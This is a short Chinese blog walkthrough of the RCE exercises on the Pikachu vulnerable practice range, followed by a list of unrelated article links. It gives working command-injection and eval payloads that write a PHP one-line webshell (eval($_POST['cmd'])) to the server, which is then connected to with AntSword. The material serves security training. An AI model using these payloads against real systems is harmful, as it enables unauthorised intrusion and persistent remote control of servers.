Pikachu靶场之RCE漏洞详解

2407-2 shw2024-09-08 16:15

一.exec "ping"

1.ping本机127.0.0.1

2.用&符拼接dir查看目录

3.&拼接echo输入一句话木马

127.0.0.1&echo "<?php @eval($_POST[cmd]);?>)" > 6.php

4.同级目录访问6.php,蚁剑连接

二:exec "eval"

1.后台使用了eval()函数,直接输入phpinfo();

2.写入一句话木马,访问shell.php

fputs(fopen('shell.php','w'),'<?php eval($_POST["cmd"])?>');

3.蚁剑连接

相关推荐
鸿腾阳阳11 分钟前
Docker Desktop 启动容器时报错
运维·docker·容器
IP搭子来一个13 分钟前
长效静态IP是什么?用途全解析
服务器·网络·tcp/ip
chniccs15 分钟前
宝塔面板去掉SSL的RSA
网络·安全·ssl
金士镧(厦门)新材料有限公司15 分钟前
稀土抑烟剂:高分子材料里的“烟害克星”
科技·安全·全文检索·生活·能源
RisunJan22 分钟前
Linux命令-lspci(显示当前主机的所有PCI总线信息)
linux·运维·服务器
DeeplyMind30 分钟前
第13章 数据卷(Volume)详解
运维·docker·容器
浮尘笔记44 分钟前
Docker从入门到实践:安装配置、常用命令与开发环境搭建
运维·docker·容器
未既1 小时前
linux以及docker修改文件描述符
linux·运维·docker
Volunteer Technology1 小时前
LangGraph的WorkFlow(一)
java·服务器·windows
程序员一点1 小时前
第9章:软件包管理(DNF 与 RPM)
linux·运维·openeuler
热门推荐
01GitHub 镜像站点02Claude Code + GLM4.7 避坑指南:解决 Unable to connect to Anthropic services03爬虫逆向之观安(观镜WEB应用安全防护系统)04openClaw安装飞书插件|核心踩坑:spawn EINVAL 错误终极解决指南05BongoCat - 跨平台键盘猫动画工具06HTB 赛季10 - Pterodactyl - user07UV安装并设置国内源08243 行 microGPT:把“训练 + 推理”拆到骨头里09openclaw配置教程(linux+局域网ollama)10openclaw 配置飞书 报错 应用未建立长连接